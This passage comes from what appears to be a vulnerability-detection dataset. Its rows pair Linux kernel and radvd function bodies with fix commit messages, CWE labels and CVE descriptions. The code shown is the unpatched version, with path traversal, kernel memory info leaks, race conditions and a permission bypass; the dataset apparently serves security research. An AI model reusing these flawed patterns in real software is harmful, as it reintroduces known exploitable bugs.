tcp_done(sk);
NET_INC_STATS_BH(sock_net(sk), LINUX_MIB_TCPABORTONDATA);
return 1;
}
tmo = tcp_fin_time(sk);
if (tmo > TCP_TIMEWAIT_LEN) {
inet_csk_reset_keepalive_timer(sk, tmo - TCP_TIMEWAIT_LEN);
} else if (th->fin || sock_owned_by_user(sk)) {
/* Bad case. We could lose such FIN otherwise.
* It is not a big problem, but it looks confusing
* and not so rare event. We still can lose it now,
* if it spins in bh_lock_sock(), but it is really
* marginal case.
*/
inet_csk_reset_keepalive_timer(sk, tmo);
} else {
tcp_time_wait(sk, TCP_FIN_WAIT2, tmo);
goto discard;
}
}
}
break;
case TCP_CLOSING:
if (tp->snd_una == tp->write_seq) {
tcp_time_wait(sk, TCP_TIME_WAIT, 0);
goto discard;
}
break;
case TCP_LAST_ACK:
if (tp->snd_una == tp->write_seq) {
tcp_update_metrics(sk);
tcp_done(sk);
goto discard;
}
break;
}
} else
goto discard;
/* step 6: check the URG bit */
tcp_urg(sk, skb, th);
/* step 7: process the segment text */
switch (sk->sk_state) {
case TCP_CLOSE_WAIT:
case TCP_CLOSING:
case TCP_LAST_ACK:
if (!before(TCP_SKB_CB(skb)->seq, tp->rcv_nxt))
break;
case TCP_FIN_WAIT1:
case TCP_FIN_WAIT2:
/* RFC 793 says to queue data in these states,
* RFC 1122 says we MUST send a reset.
* BSD 4.4 also does reset.
*/
if (sk->sk_shutdown & RCV_SHUTDOWN) {
if (TCP_SKB_CB(skb)->end_seq != TCP_SKB_CB(skb)->seq &&
after(TCP_SKB_CB(skb)->end_seq - th->fin, tp->rcv_nxt)) {
NET_INC_STATS_BH(sock_net(sk), LINUX_MIB_TCPABORTONDATA);
tcp_reset(sk);
return 1;
}
}
/* Fall through */
case TCP_ESTABLISHED:
tcp_data_queue(sk, skb);
queued = 1;
break;
}
/* tcp_data could move socket to TIME-WAIT */
if (sk->sk_state != TCP_CLOSE) {
tcp_data_snd_check(sk);
tcp_ack_snd_check(sk);
}
if (!queued) {
discard:
__kfree_skb(skb);
}
return 0;
}
| 47,732,656,845,780,370,000,000,000,000,000,000,000 | tcp_input.c | 112,625,197,681,995,050,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2012-6638 | The tcp_rcv_state_process function in net/ipv4/tcp_input.c in the Linux kernel before 3.2.24 allows remote attackers to cause a denial of service (kernel resource consumption) via a flood of SYN+FIN TCP packets, a different vulnerability than CVE-2012-2663. | https://nvd.nist.gov/vuln/detail/CVE-2012-6638 |
1,418 | radvd | 92e22ca23e52066da2258df8c76a2dca8a428bcc | https://github.com/reubenhwk/radvd | https://github.com/reubenhwk/radvd/commit/92e22ca23e52066da2258df8c76a2dca8a428bcc | set_interface_var() doesn't check interface name and blindly does
fopen(path "/" ifname, "w") on it. As "ifname" is an untrusted input, it
should be checked for ".." and/or "/" in it. Otherwise, an infected
unprivileged daemon may overwrite contents of file named "mtu",
"hoplimit", etc. in arbitrary location with arbitrary 32-bit value in
decimal representation ("%d"). If an attacker has a local account or
may create arbitrary symlinks with these names in any location (e.g.
/tmp), any file may be overwritten with a decimal value. | 1 | set_interface_var(const char *iface,
const char *var, const char *name,
uint32_t val)
{
FILE *fp;
char spath[64+IFNAMSIZ]; /* XXX: magic constant */
if (snprintf(spath, sizeof(spath), var, iface) >= sizeof(spath))
return -1;
if (access(spath, F_OK) != 0)
return -1;
fp = fopen(spath, "w");
if (!fp) {
if (name)
flog(LOG_ERR, "failed to set %s (%u) for %s: %s",
name, val, iface, strerror(errno));
return -1;
}
fprintf(fp, "%u", val);
fclose(fp);
return 0;
}
| 281,398,530,467,193,600,000,000,000,000,000,000,000 | device-linux.c | 290,895,116,251,977,450,000,000,000,000,000,000,000 | [
"CWE-22"
] | CVE-2011-3602 | Directory traversal vulnerability in device-linux.c in the router advertisement daemon (radvd) before 1.8.2 allows local users to overwrite arbitrary files, and remote attackers to overwrite certain files, via a .. (dot dot) in an interface name. NOTE: this can be leveraged with a symlink to overwrite arbitrary files. | https://nvd.nist.gov/vuln/detail/CVE-2011-3602 |
1,419 | linux | 819cbb120eaec7e014e5abd029260db1ca8c5735 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/819cbb120eaec7e014e5abd029260db1ca8c5735 | staging: comedi: fix infoleak to userspace
driver_name and board_name are pointers to strings, not buffers of size
COMEDI_NAMELEN. Copying COMEDI_NAMELEN bytes of a string containing
less than COMEDI_NAMELEN-1 bytes would leak some unrelated bytes.
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Cc: stable <stable@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> | 1 | static int do_devinfo_ioctl(struct comedi_device *dev,
struct comedi_devinfo __user *arg,
struct file *file)
{
struct comedi_devinfo devinfo;
const unsigned minor = iminor(file->f_dentry->d_inode);
struct comedi_device_file_info *dev_file_info =
comedi_get_device_file_info(minor);
struct comedi_subdevice *read_subdev =
comedi_get_read_subdevice(dev_file_info);
struct comedi_subdevice *write_subdev =
comedi_get_write_subdevice(dev_file_info);
memset(&devinfo, 0, sizeof(devinfo));
/* fill devinfo structure */
devinfo.version_code = COMEDI_VERSION_CODE;
devinfo.n_subdevs = dev->n_subdevices;
memcpy(devinfo.driver_name, dev->driver->driver_name, COMEDI_NAMELEN);
memcpy(devinfo.board_name, dev->board_name, COMEDI_NAMELEN);
if (read_subdev)
devinfo.read_subdevice = read_subdev - dev->subdevices;
else
devinfo.read_subdevice = -1;
if (write_subdev)
devinfo.write_subdevice = write_subdev - dev->subdevices;
else
devinfo.write_subdevice = -1;
if (copy_to_user(arg, &devinfo, sizeof(struct comedi_devinfo)))
return -EFAULT;
return 0;
}
| 274,220,629,135,533,150,000,000,000,000,000,000,000 | comedi_fops.c | 50,834,563,733,571,210,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2011-2909 | The do_devinfo_ioctl function in drivers/staging/comedi/comedi_fops.c in the Linux kernel before 3.1 allows local users to obtain sensitive information from kernel memory via a copy of a short string. | https://nvd.nist.gov/vuln/detail/CVE-2011-2909 |
1,420 | linux | fc3a9157d3148ab91039c75423da8ef97be3e105 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/fc3a9157d3148ab91039c75423da8ef97be3e105 | KVM: X86: Don't report L2 emulation failures to user-space
This patch prevents that emulation failures which result
from emulating an instruction for an L2-Guest results in
being reported to userspace.
Without this patch a malicious L2-Guest would be able to
kill the L1 by triggering a race-condition between an vmexit
and the instruction emulator.
With this patch the L2 will most likely only kill itself in
this situation.
Signed-off-by: Joerg Roedel <joerg.roedel@amd.com>
Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> | 1 | static int handle_emulation_failure(struct kvm_vcpu *vcpu)
{
++vcpu->stat.insn_emulation_fail;
trace_kvm_emulate_insn_failed(vcpu);
vcpu->run->exit_reason = KVM_EXIT_INTERNAL_ERROR;
vcpu->run->internal.suberror = KVM_INTERNAL_ERROR_EMULATION;
vcpu->run->internal.ndata = 0;
kvm_queue_exception(vcpu, UD_VECTOR);
return EMULATE_FAIL;
}
| 279,029,284,746,417,500,000,000,000,000,000,000,000 | x86.c | 157,489,028,681,611,200,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2010-5313 | Race condition in arch/x86/kvm/x86.c in the Linux kernel before 2.6.38 allows L2 guest OS users to cause a denial of service (L1 guest OS crash) via a crafted instruction that triggers an L2 emulation failure report, a similar issue to CVE-2014-7842. | https://nvd.nist.gov/vuln/detail/CVE-2010-5313 |
1,421 | linux | acff81ec2c79492b180fade3c2894425cd35a545 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/acff81ec2c79492b180fade3c2894425cd35a545 | ovl: fix permission checking for setattr
[Al Viro] The bug is in being too enthusiastic about optimizing ->setattr()
away - instead of "copy verbatim with metadata" + "chmod/chown/utimes"
(with the former being always safe and the latter failing in case of
insufficient permissions) it tries to combine these two. Note that copyup
itself will have to do ->setattr() anyway; _that_ is where the elevated
capabilities are right. Having these two ->setattr() (one to set verbatim
copy of metadata, another to do what overlayfs ->setattr() had been asked
to do in the first place) combined is where it breaks.
Signed-off-by: Miklos Szeredi <miklos@szeredi.hu>
Cc: <stable@vger.kernel.org>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | int ovl_setattr(struct dentry *dentry, struct iattr *attr)
{
int err;
struct dentry *upperdentry;
err = ovl_want_write(dentry);
if (err)
goto out;
upperdentry = ovl_dentry_upper(dentry);
if (upperdentry) {
mutex_lock(&upperdentry->d_inode->i_mutex);
err = notify_change(upperdentry, attr, NULL);
mutex_unlock(&upperdentry->d_inode->i_mutex);
} else {
err = ovl_copy_up_last(dentry, attr, false);
}
ovl_drop_write(dentry);
out:
return err;
}
| 126,591,340,298,897,650,000,000,000,000,000,000,000 | inode.c | 334,612,864,203,734,400,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-8660 | The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8660 |
1,422 | linux | 09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
Reported-by: Dmitry Vyukov <dvyukov@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pptp_bind(struct socket *sock, struct sockaddr *uservaddr,
int sockaddr_len)
{
struct sock *sk = sock->sk;
struct sockaddr_pppox *sp = (struct sockaddr_pppox *) uservaddr;
struct pppox_sock *po = pppox_sk(sk);
struct pptp_opt *opt = &po->proto.pptp;
int error = 0;
lock_sock(sk);
opt->src_addr = sp->sa_addr.pptp;
if (add_chan(po))
error = -EBUSY;
release_sock(sk);
return error;
}
| 83,894,244,210,840,040,000,000,000,000,000,000,000 | pptp.c | 269,998,178,809,154,600,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-8569 | The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel through 4.3.3 do not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8569 |
1,423 | linux | 09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
Reported-by: Dmitry Vyukov <dvyukov@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pptp_connect(struct socket *sock, struct sockaddr *uservaddr,
int sockaddr_len, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_pppox *sp = (struct sockaddr_pppox *) uservaddr;
struct pppox_sock *po = pppox_sk(sk);
struct pptp_opt *opt = &po->proto.pptp;
struct rtable *rt;
struct flowi4 fl4;
int error = 0;
if (sp->sa_protocol != PX_PROTO_PPTP)
return -EINVAL;
if (lookup_chan_dst(sp->sa_addr.pptp.call_id, sp->sa_addr.pptp.sin_addr.s_addr))
return -EALREADY;
lock_sock(sk);
/* Check for already bound sockets */
if (sk->sk_state & PPPOX_CONNECTED) {
error = -EBUSY;
goto end;
}
/* Check for already disconnected sockets, on attempts to disconnect */
if (sk->sk_state & PPPOX_DEAD) {
error = -EALREADY;
goto end;
}
if (!opt->src_addr.sin_addr.s_addr || !sp->sa_addr.pptp.sin_addr.s_addr) {
error = -EINVAL;
goto end;
}
po->chan.private = sk;
po->chan.ops = &pptp_chan_ops;
rt = ip_route_output_ports(sock_net(sk), &fl4, sk,
opt->dst_addr.sin_addr.s_addr,
opt->src_addr.sin_addr.s_addr,
0, 0,
IPPROTO_GRE, RT_CONN_FLAGS(sk), 0);
if (IS_ERR(rt)) {
error = -EHOSTUNREACH;
goto end;
}
sk_setup_caps(sk, &rt->dst);
po->chan.mtu = dst_mtu(&rt->dst);
if (!po->chan.mtu)
po->chan.mtu = PPP_MRU;
ip_rt_put(rt);
po->chan.mtu -= PPTP_HEADER_OVERHEAD;
po->chan.hdrlen = 2 + sizeof(struct pptp_gre_header);
error = ppp_register_channel(&po->chan);
if (error) {
pr_err("PPTP: failed to register PPP channel (%d)\n", error);
goto end;
}
opt->dst_addr = sp->sa_addr.pptp;
sk->sk_state = PPPOX_CONNECTED;
end:
release_sock(sk);
return error;
}
| 246,845,620,878,079,550,000,000,000,000,000,000,000 | pptp.c | 269,998,178,809,154,600,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-8569 | The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel through 4.3.3 do not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8569 |
1,433 | linux | 8c7188b23474cca017b3ef354c4a58456f68303a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8c7188b23474cca017b3ef354c4a58456f68303a | RDS: fix race condition when sending a message on unbound socket
Sasha's found a NULL pointer dereference in the RDS connection code when
sending a message to an apparently unbound socket. The problem is caused
by the code checking if the socket is bound in rds_sendmsg(), which checks
the rs_bound_addr field without taking a lock on the socket. This opens a
race where rs_bound_addr is temporarily set but where the transport is not
in rds_bind(), leading to a NULL pointer dereference when trying to
dereference 'trans' in __rds_conn_create().
Vegard wrote a reproducer for this issue, so kindly ask him to share if
you're interested.
I cannot reproduce the NULL pointer dereference using Vegard's reproducer
with this patch, whereas I could without.
Complete earlier incomplete fix to CVE-2015-6937:
74e98eb08588 ("RDS: verify the underlying transport exists before creating a connection")
Cc: David S. Miller <davem@davemloft.net>
Cc: stable@vger.kernel.org
Reviewed-by: Vegard Nossum <vegard.nossum@oracle.com>
Reviewed-by: Sasha Levin <sasha.levin@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
{
struct sock *sk = sock->sk;
struct rds_sock *rs = rds_sk_to_rs(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, usin, msg->msg_name);
__be32 daddr;
__be16 dport;
struct rds_message *rm = NULL;
struct rds_connection *conn;
int ret = 0;
int queued = 0, allocated_mr = 0;
int nonblock = msg->msg_flags & MSG_DONTWAIT;
long timeo = sock_sndtimeo(sk, nonblock);
/* Mirror Linux UDP mirror of BSD error message compatibility */
/* XXX: Perhaps MSG_MORE someday */
if (msg->msg_flags & ~(MSG_DONTWAIT | MSG_CMSG_COMPAT)) {
ret = -EOPNOTSUPP;
goto out;
}
if (msg->msg_namelen) {
/* XXX fail non-unicast destination IPs? */
if (msg->msg_namelen < sizeof(*usin) || usin->sin_family != AF_INET) {
ret = -EINVAL;
goto out;
}
daddr = usin->sin_addr.s_addr;
dport = usin->sin_port;
} else {
/* We only care about consistency with ->connect() */
lock_sock(sk);
daddr = rs->rs_conn_addr;
dport = rs->rs_conn_port;
release_sock(sk);
}
/* racing with another thread binding seems ok here */
if (daddr == 0 || rs->rs_bound_addr == 0) {
ret = -ENOTCONN; /* XXX not a great errno */
goto out;
}
if (payload_len > rds_sk_sndbuf(rs)) {
ret = -EMSGSIZE;
goto out;
}
/* size of rm including all sgs */
ret = rds_rm_size(msg, payload_len);
if (ret < 0)
goto out;
rm = rds_message_alloc(ret, GFP_KERNEL);
if (!rm) {
ret = -ENOMEM;
goto out;
}
/* Attach data to the rm */
if (payload_len) {
rm->data.op_sg = rds_message_alloc_sgs(rm, ceil(payload_len, PAGE_SIZE));
if (!rm->data.op_sg) {
ret = -ENOMEM;
goto out;
}
ret = rds_message_copy_from_user(rm, &msg->msg_iter);
if (ret)
goto out;
}
rm->data.op_active = 1;
rm->m_daddr = daddr;
/* rds_conn_create has a spinlock that runs with IRQ off.
* Caching the conn in the socket helps a lot. */
if (rs->rs_conn && rs->rs_conn->c_faddr == daddr)
conn = rs->rs_conn;
else {
conn = rds_conn_create_outgoing(sock_net(sock->sk),
rs->rs_bound_addr, daddr,
rs->rs_transport,
sock->sk->sk_allocation);
if (IS_ERR(conn)) {
ret = PTR_ERR(conn);
goto out;
}
rs->rs_conn = conn;
}
/* Parse any control messages the user may have included. */
ret = rds_cmsg_send(rs, rm, msg, &allocated_mr);
if (ret)
goto out;
if (rm->rdma.op_active && !conn->c_trans->xmit_rdma) {
printk_ratelimited(KERN_NOTICE "rdma_op %p conn xmit_rdma %p\n",
&rm->rdma, conn->c_trans->xmit_rdma);
ret = -EOPNOTSUPP;
goto out;
}
if (rm->atomic.op_active && !conn->c_trans->xmit_atomic) {
printk_ratelimited(KERN_NOTICE "atomic_op %p conn xmit_atomic %p\n",
&rm->atomic, conn->c_trans->xmit_atomic);
ret = -EOPNOTSUPP;
goto out;
}
rds_conn_connect_if_down(conn);
ret = rds_cong_wait(conn->c_fcong, dport, nonblock, rs);
if (ret) {
rs->rs_seen_congestion = 1;
goto out;
}
while (!rds_send_queue_rm(rs, conn, rm, rs->rs_bound_port,
dport, &queued)) {
rds_stats_inc(s_send_queue_full);
if (nonblock) {
ret = -EAGAIN;
goto out;
}
timeo = wait_event_interruptible_timeout(*sk_sleep(sk),
rds_send_queue_rm(rs, conn, rm,
rs->rs_bound_port,
dport,
&queued),
timeo);
rdsdebug("sendmsg woke queued %d timeo %ld\n", queued, timeo);
if (timeo > 0 || timeo == MAX_SCHEDULE_TIMEOUT)
continue;
ret = timeo;
if (ret == 0)
ret = -ETIMEDOUT;
goto out;
}
/*
* By now we've committed to the send. We reuse rds_send_worker()
* to retry sends in the rds thread if the transport asks us to.
*/
rds_stats_inc(s_send_queued);
ret = rds_send_xmit(conn);
if (ret == -ENOMEM || ret == -EAGAIN)
queue_delayed_work(rds_wq, &conn->c_send_w, 1);
rds_message_put(rm);
return payload_len;
out:
/* If the user included a RDMA_MAP cmsg, we allocated a MR on the fly.
* If the sendmsg goes through, we keep the MR. If it fails with EAGAIN
* or in any other way, we need to destroy the MR again */
if (allocated_mr)
rds_rdma_unuse(rs, rds_rdma_cookie_key(rm->m_rdma_cookie), 1);
if (rm)
rds_message_put(rm);
return ret;
}
| 63,125,872,970,388,840,000,000,000,000,000,000,000 | send.c | 261,842,697,984,098,440,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7990 | Race condition in the rds_sendmsg function in net/rds/sendmsg.c in the Linux kernel before 4.3.3 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6937. | https://nvd.nist.gov/vuln/detail/CVE-2015-7990 |
1,434 | linux | 4b6184336ebb5c8dc1eae7f7ab46ee608a748b05 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4b6184336ebb5c8dc1eae7f7ab46ee608a748b05 | staging/dgnc: fix info leak in ioctl
The dgnc_mgmt_ioctl() code fails to initialize the 16 _reserved bytes of
struct digi_dinfo after the ->dinfo_nboards member. Add an explicit
memset(0) before filling the structure to avoid the info leak.
Signed-off-by: Salva Peiró <speirofr@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | long dgnc_mgmt_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
unsigned long flags;
void __user *uarg = (void __user *)arg;
switch (cmd) {
case DIGI_GETDD:
{
/*
* This returns the total number of boards
* in the system, as well as driver version
* and has space for a reserved entry
*/
struct digi_dinfo ddi;
spin_lock_irqsave(&dgnc_global_lock, flags);
ddi.dinfo_nboards = dgnc_NumBoards;
sprintf(ddi.dinfo_version, "%s", DG_PART);
spin_unlock_irqrestore(&dgnc_global_lock, flags);
if (copy_to_user(uarg, &ddi, sizeof(ddi)))
return -EFAULT;
break;
}
case DIGI_GETBD:
{
int brd;
struct digi_info di;
if (copy_from_user(&brd, uarg, sizeof(int)))
return -EFAULT;
if (brd < 0 || brd >= dgnc_NumBoards)
return -ENODEV;
memset(&di, 0, sizeof(di));
di.info_bdnum = brd;
spin_lock_irqsave(&dgnc_Board[brd]->bd_lock, flags);
di.info_bdtype = dgnc_Board[brd]->dpatype;
di.info_bdstate = dgnc_Board[brd]->dpastatus;
di.info_ioport = 0;
di.info_physaddr = (ulong)dgnc_Board[brd]->membase;
di.info_physsize = (ulong)dgnc_Board[brd]->membase
- dgnc_Board[brd]->membase_end;
if (dgnc_Board[brd]->state != BOARD_FAILED)
di.info_nports = dgnc_Board[brd]->nasync;
else
di.info_nports = 0;
spin_unlock_irqrestore(&dgnc_Board[brd]->bd_lock, flags);
if (copy_to_user(uarg, &di, sizeof(di)))
return -EFAULT;
break;
}
case DIGI_GET_NI_INFO:
{
struct channel_t *ch;
struct ni_info ni;
unsigned char mstat = 0;
uint board = 0;
uint channel = 0;
if (copy_from_user(&ni, uarg, sizeof(ni)))
return -EFAULT;
board = ni.board;
channel = ni.channel;
/* Verify boundaries on board */
if (board >= dgnc_NumBoards)
return -ENODEV;
/* Verify boundaries on channel */
if (channel >= dgnc_Board[board]->nasync)
return -ENODEV;
ch = dgnc_Board[board]->channels[channel];
if (!ch || ch->magic != DGNC_CHANNEL_MAGIC)
return -ENODEV;
memset(&ni, 0, sizeof(ni));
ni.board = board;
ni.channel = channel;
spin_lock_irqsave(&ch->ch_lock, flags);
mstat = (ch->ch_mostat | ch->ch_mistat);
if (mstat & UART_MCR_DTR) {
ni.mstat |= TIOCM_DTR;
ni.dtr = TIOCM_DTR;
}
if (mstat & UART_MCR_RTS) {
ni.mstat |= TIOCM_RTS;
ni.rts = TIOCM_RTS;
}
if (mstat & UART_MSR_CTS) {
ni.mstat |= TIOCM_CTS;
ni.cts = TIOCM_CTS;
}
if (mstat & UART_MSR_RI) {
ni.mstat |= TIOCM_RI;
ni.ri = TIOCM_RI;
}
if (mstat & UART_MSR_DCD) {
ni.mstat |= TIOCM_CD;
ni.dcd = TIOCM_CD;
}
if (mstat & UART_MSR_DSR)
ni.mstat |= TIOCM_DSR;
ni.iflag = ch->ch_c_iflag;
ni.oflag = ch->ch_c_oflag;
ni.cflag = ch->ch_c_cflag;
ni.lflag = ch->ch_c_lflag;
if (ch->ch_digi.digi_flags & CTSPACE ||
ch->ch_c_cflag & CRTSCTS)
ni.hflow = 1;
else
ni.hflow = 0;
if ((ch->ch_flags & CH_STOPI) ||
(ch->ch_flags & CH_FORCED_STOPI))
ni.recv_stopped = 1;
else
ni.recv_stopped = 0;
if ((ch->ch_flags & CH_STOP) || (ch->ch_flags & CH_FORCED_STOP))
ni.xmit_stopped = 1;
else
ni.xmit_stopped = 0;
ni.curtx = ch->ch_txcount;
ni.currx = ch->ch_rxcount;
ni.baud = ch->ch_old_baud;
spin_unlock_irqrestore(&ch->ch_lock, flags);
if (copy_to_user(uarg, &ni, sizeof(ni)))
return -EFAULT;
break;
}
}
return 0;
}
| 193,364,450,923,515,900,000,000,000,000,000,000,000 | dgnc_mgmt.c | 195,319,938,365,409,150,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-7885 | The dgnc_mgmt_ioctl function in drivers/staging/dgnc/dgnc_mgmt.c in the Linux kernel through 4.3.3 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-7885 |
1,435 | linux | eda98796aff0d9bf41094b06811f5def3b4c333c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/eda98796aff0d9bf41094b06811f5def3b4c333c | [media] media/vivid-osd: fix info leak in ioctl
The vivid_fb_ioctl() code fails to initialize the 16 _reserved bytes of
struct fb_vblank after the ->hcount member. Add an explicit
memset(0) before filling the structure to avoid the info leak.
Signed-off-by: Salva Peiró <speirofr@gmail.com>
Signed-off-by: Hans Verkuil <hans.verkuil@cisco.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com> | 1 | static int vivid_fb_ioctl(struct fb_info *info, unsigned cmd, unsigned long arg)
{
struct vivid_dev *dev = (struct vivid_dev *)info->par;
switch (cmd) {
case FBIOGET_VBLANK: {
struct fb_vblank vblank;
vblank.flags = FB_VBLANK_HAVE_COUNT | FB_VBLANK_HAVE_VCOUNT |
FB_VBLANK_HAVE_VSYNC;
vblank.count = 0;
vblank.vcount = 0;
vblank.hcount = 0;
if (copy_to_user((void __user *)arg, &vblank, sizeof(vblank)))
return -EFAULT;
return 0;
}
default:
dprintk(dev, 1, "Unknown ioctl %08x\n", cmd);
return -EINVAL;
}
return 0;
}
| 326,103,382,253,395,940,000,000,000,000,000,000,000 | vivid-osd.c | 31,449,737,973,003,174,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-7884 | The vivid_fb_ioctl function in drivers/media/platform/vivid/vivid-osd.c in the Linux kernel through 4.3.3 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-7884 |
1,436 | linux | ce1fad2740c648a4340f6f6c391a8a83769d2e8c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/ce1fad2740c648a4340f6f6c391a8a83769d2e8c | Merge branch 'keys-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs
Pull key handling fixes from David Howells:
"Here are two patches, the first of which at least should go upstream
immediately:
(1) Prevent a user-triggerable crash in the keyrings destructor when a
negatively instantiated keyring is garbage collected. I have also
seen this triggered for user type keys.
(2) Prevent the user from using requesting that a keyring be created
and instantiated through an upcall. Doing so is probably safe
since the keyring type ignores the arguments to its instantiation
function - but we probably shouldn't let keyrings be created in
this manner"
* 'keys-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs:
KEYS: Don't permit request_key() to construct a new keyring
KEYS: Fix crash when attempt to garbage collect an uninstantiated keyring | 1 | static noinline void key_gc_unused_keys(struct list_head *keys)
{
while (!list_empty(keys)) {
struct key *key =
list_entry(keys->next, struct key, graveyard_link);
list_del(&key->graveyard_link);
kdebug("- %u", key->serial);
key_check(key);
/* Throw away the key data */
if (key->type->destroy)
key->type->destroy(key);
security_key_free(key);
/* deal with the user's key tracking and quota */
if (test_bit(KEY_FLAG_IN_QUOTA, &key->flags)) {
spin_lock(&key->user->lock);
key->user->qnkeys--;
key->user->qnbytes -= key->quotalen;
spin_unlock(&key->user->lock);
}
atomic_dec(&key->user->nkeys);
if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
atomic_dec(&key->user->nikeys);
key_user_put(key->user);
kfree(key->description);
#ifdef KEY_DEBUGGING
key->magic = KEY_DEBUG_MAGIC_X;
#endif
kmem_cache_free(key_jar, key);
}
}
| 121,918,299,636,917,930,000,000,000,000,000,000,000 | gc.c | 241,205,744,750,980,900,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-7872 | The key_gc_unused_keys function in security/keys/gc.c in the Linux kernel through 4.2.6 allows local users to cause a denial of service (OOPS) via crafted keyctl commands. | https://nvd.nist.gov/vuln/detail/CVE-2015-7872 |
1,437 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | static int newque(struct ipc_namespace *ns, struct ipc_params *params)
{
struct msg_queue *msq;
int id, retval;
key_t key = params->key;
int msgflg = params->flg;
msq = ipc_rcu_alloc(sizeof(*msq));
if (!msq)
return -ENOMEM;
msq->q_perm.mode = msgflg & S_IRWXUGO;
msq->q_perm.key = key;
msq->q_perm.security = NULL;
retval = security_msg_queue_alloc(msq);
if (retval) {
ipc_rcu_putref(msq, ipc_rcu_free);
return retval;
}
/* ipc_addid() locks msq upon success. */
id = ipc_addid(&msg_ids(ns), &msq->q_perm, ns->msg_ctlmni);
if (id < 0) {
ipc_rcu_putref(msq, msg_rcu_free);
return id;
}
msq->q_stime = msq->q_rtime = 0;
msq->q_ctime = get_seconds();
msq->q_cbytes = msq->q_qnum = 0;
msq->q_qbytes = ns->msg_ctlmnb;
msq->q_lspid = msq->q_lrpid = 0;
INIT_LIST_HEAD(&msq->q_messages);
INIT_LIST_HEAD(&msq->q_receivers);
INIT_LIST_HEAD(&msq->q_senders);
ipc_unlock_object(&msq->q_perm);
rcu_read_unlock();
return msq->q_perm.id;
}
| 145,137,506,070,763,420,000,000,000,000,000,000,000 | msg.c | 137,063,545,741,306,320,000,000,000,000,000,000,000 | [
"CWE-362"
